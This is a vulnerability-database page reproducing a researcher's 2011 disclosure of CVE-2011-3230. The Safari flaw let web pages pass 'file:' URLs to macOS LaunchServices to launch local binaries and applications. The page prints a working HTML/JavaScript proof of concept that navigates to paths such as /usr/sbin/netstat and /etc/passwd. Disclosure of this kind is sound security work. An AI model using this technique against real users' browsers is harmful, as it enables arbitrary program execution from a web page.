Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2011-3230

Publish Date: 15 Oct 2011

Source

                							

                CVE: CVE-2011-3230
Found By: Aaron Sigel of vtty.com

There's not a ton to say about this bug aside from "Yikes"!  I think the PoC speaks for itself.  This allows you to send any "file:" url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page.  The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it.  Other than that, you can run or launch anything you can access by using the method in the html provided below.




&lt;html&gt;
&lt;head&gt;
&lt;base href="file://"&gt;
&lt;script&gt;
 function DoIt() {
  alert(document.getElementById("cmdToRun").value);
  document.location=document.getElementById("cmdToRun").value;
 }
&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;select id="cmdToRun"&gt;
 &lt;option value="/usr/sbin/netstat"&gt;Launch /usr/bin/netstat&lt;/option&gt;
 &lt;option value="/etc/passwd"&gt;Launch /etc/passwd&lt;/option&gt;
 &lt;option value="/Applications/Utilities/Bluetooth File Exchange.app"&gt;
Launch Bluetooth File Exchange.app&lt;/option&gt;
&lt;/select&gt;
&lt;br /&gt;
&lt;input type=button value="Launch" onclick="DoIt()"&gt;
&lt;br /&gt;
&lt;/body&gt;
&lt;/html&gt;


Apple's advisory: http://support.apple.com/kb/HT5000
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Apple Safari Arbitrary Code Execution

Vulmon Search

About

Products

Connect